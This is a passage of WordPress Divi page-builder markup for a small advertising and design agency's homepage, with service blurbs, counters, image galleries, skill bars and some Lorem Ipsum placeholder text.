custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" 